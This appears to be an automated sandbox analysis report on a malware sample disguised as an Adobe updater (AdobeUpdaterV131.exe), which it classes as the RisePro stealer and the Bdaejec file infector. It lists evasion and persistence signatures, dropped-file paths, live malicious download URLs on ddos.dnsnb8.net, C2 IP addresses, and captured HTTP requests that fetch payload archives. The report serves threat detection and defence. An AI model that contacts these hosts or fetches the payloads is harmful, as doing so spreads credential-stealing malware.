Windows Analysis Report
AdobeUpdaterV131.exe

Overview

General Information

Sample name: AdobeUpdaterV131.exe
Analysis ID: 1480703
MD5: 0bfb030dcbf461f2c76087e4b9856836
SHA1: 75425a8dc79a21373520a241a7c51d9a1ce7e91a
SHA256: bdb5f42b5e4709134a4f963b9648af4f8e19e2011937f72ff3b75488887e3f14
Tags: exe
Infos:

Detection

Bdaejec, RisePro Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Yara detected Bdaejec
Yara detected RisePro Stealer
AI detected suspicious sample
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: AdobeUpdaterV131.exe Avira: detected
Antivirus detection for URL or domain
Source: http://ddos.dnsnb8.net:799/cj//k1.rar URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net/ URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rar Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rar Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rars Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarUa Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rar8 Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarC: Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k4.rarsC: Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarcC: Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.raryY Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k3.rarXY$$m Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar7 Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k5.rar?Y Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net/v Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k4.rar)X Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarcag$ Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rar1b Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarq Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarFSXY$$m Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarU Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k5.rar Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rars Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarsC: Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarhg Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k4.rar Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarMp Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k5.rarC: Avira URL Cloud: Label: phishing
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Program Files\7-Zip\Uninstall.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Avira: detection malicious, Label: W32/Jadtre.B
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Joe Sandbox ML: detected
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Uninstall.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: AdobeUpdaterV131.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: AdobeUpdaterV131.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

Spreading
barindex
Infects executable files (exe, dll, sys, html)
Source: C:\Users\user\AppData\Local\Temp\xRp.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe System file written: C:\Program Files\7-Zip\Uninstall.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Code function: 1_2_004E29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 1_2_004E29E2
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Code function: 15_2_00E329E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 15_2_00E329E2
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Code function: 1_2_004E2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread, 1_2_004E2B8C
Source: C:\Users\user\AppData\Local\Temp\xRp.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\ Jump to behavior

Networking
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 799
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 44.221.84.105:799
Source: global traffic TCP traffic: 192.168.2.4:49732 -> 193.233.132.62:50500
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 44.221.84.105 44.221.84.105
Source: Joe Sandbox View IP Address: 193.233.132.62 193.233.132.62
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Code function: 0_2_0063D620 recv,WSAStartup,closesocket,socket,connect,closesocket, 0_2_0063D620
Source: global traffic HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: ddos.dnsnb8.net
Source: xRp.exe, 00000001.00000003.1658769932.0000000000520000.00000004.00001000.00020000.00000000.sdmp, xRp.exe, 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmp, xRp.exe, 0000000F.00000003.1890235266.0000000000B60000.00000004.00001000.00020000.00000000.sdmp, xRp.exe, 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmp String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: xRp.exe, 0000000F.00000003.1903569689.000000000089B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net/
Source: xRp.exe, 00000001.00000002.1856041634.000000000090E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net/v
Source: xRp.exe, 0000000F.00000003.1903569689.000000000086B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: xRp.exe, 0000000F.00000003.1903569689.000000000086B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar1b
Source: xRp.exe, 00000001.00000003.1666399765.00000000008E8000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 00000001.00000002.1856041634.00000000008DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar7
Source: xRp.exe, 0000000F.00000003.1903569689.000000000086B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarFSXY$$m
Source: xRp.exe, 0000000F.00000003.1903569689.00000000008CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarS
Source: xRp.exe, 0000000F.00000003.1903569689.00000000008CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarU
Source: xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000003.1903569689.000000000086B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarUa
Source: xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000003.1903569689.000000000086B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarcag$
Source: xRp.exe, 00000001.00000003.1666399765.00000000008E8000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 00000001.00000002.1856041634.00000000008DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarhg
Source: xRp.exe, 00000001.00000003.1666399765.00000000008E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rars
Source: xRp.exe, 0000000F.00000003.1903569689.000000000089B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarsC:
Source: xRp.exe, 00000001.00000002.1856041634.000000000091E000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 00000001.00000002.1857202345.00000000022EA000.00000004.00000010.00020000.00000000.sdmp, xRp.exe, 00000001.00000002.1856041634.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 00000001.00000002.1856041634.000000000087D000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000002.2058481763.000000000089B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
Source: xRp.exe, 00000001.00000002.1856041634.00000000008DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar8
Source: xRp.exe, 00000001.00000002.1856041634.000000000087D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarC:
Source: xRp.exe, 00000001.00000002.1857202345.00000000022EA000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarMp
Source: xRp.exe, 0000000F.00000002.2058481763.000000000089B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarcC:
Source: xRp.exe, 00000001.00000002.1856041634.00000000008DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarq
Source: xRp.exe, 00000001.00000002.1856041634.00000000008DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rars
Source: xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.raryY
Source: xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar
Source: xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rarXY$$m
Source: xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000002.2058481763.000000000089B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar
Source: xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar)X
Source: xRp.exe, 0000000F.00000002.2058481763.000000000089B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rarsC:
Source: xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000002.2058481763.000000000089B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar
Source: xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar?Y
Source: xRp.exe, 0000000F.00000002.2058481763.000000000089B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rarC:
Source: Amcache.hve.1.dr String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.1.dr String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.1.dr String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.1.dr String found in binary or memory: http://www.develop.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.1.dr String found in binary or memory: http://www.lua.org
Source: SciTE.exe.1.dr String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.1.dr String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.1.dr String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.1.dr String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.spaceblue.comMathias
Source: AdobeUpdaterV131.exe, 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, AdobeUpdaterV131.exe, 00000000.00000003.1682921279.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, MPGPH131.exe, 00000009.00000003.1743597679.0000000005370000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000003.1743345459.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, RageMP131.exe, 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 0000000C.00000003.1823053506.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000003.1907814686.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: AdobeUpdaterV131.exe, 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, AdobeUpdaterV131.exe, 00000000.00000003.1682921279.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, MPGPH131.exe, 00000009.00000003.1743597679.0000000005370000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000003.1743345459.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, RageMP131.exe, 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 0000000C.00000003.1823053506.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000003.1907814686.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp String found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWSASendWs2_32.dll
Source: xRp.exe, 00000001.00000003.1666399765.00000000008E8000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 00000001.00000002.1856041634.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000002.2058481763.00000000008C6000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000003.1903569689.00000000008CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: AdobeUpdaterV131.exe, 00000000.00000002.4131093873.000000000117D000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000009.00000002.4130830762.000000000145D000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000002.4130977280.000000000122A000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000C.00000002.4131081947.000000000111E000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000002.4131139448.0000000001138000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORT
Source: RageMP131.exe, 0000000C.00000002.4131081947.000000000111E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORTF/
Source: MPGPH131.exe, 00000009.00000002.4130830762.000000000145D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORTFs
Source: SciTE.exe.1.dr String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.1.dr String found in binary or memory: https://www.smartsharesystems.com/Morten
Installs a raw input device (often for capturing keystrokes)
Source: SciTE.exe.1.dr Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \ memstr_77af7215-3

System Summary
barindex
PE file contains section with special chars
Source: AdobeUpdaterV131.exe Static PE information: section name:
Source: AdobeUpdaterV131.exe Static PE information: section name: .idata
Source: AdobeUpdaterV131.exe Static PE information: section name:
Source: MPGPH131.exe.0.dr Static PE information: section name:
Source: MPGPH131.exe.0.dr Static PE information: section name: .idata
Source: MPGPH131.exe.0.dr Static PE information: section name:
Source: RageMP131.exe.0.dr Static PE information: section name:
Source: RageMP131.exe.0.dr Static PE information: section name: .idata
Source: RageMP131.exe.0.dr Static PE information: section name:
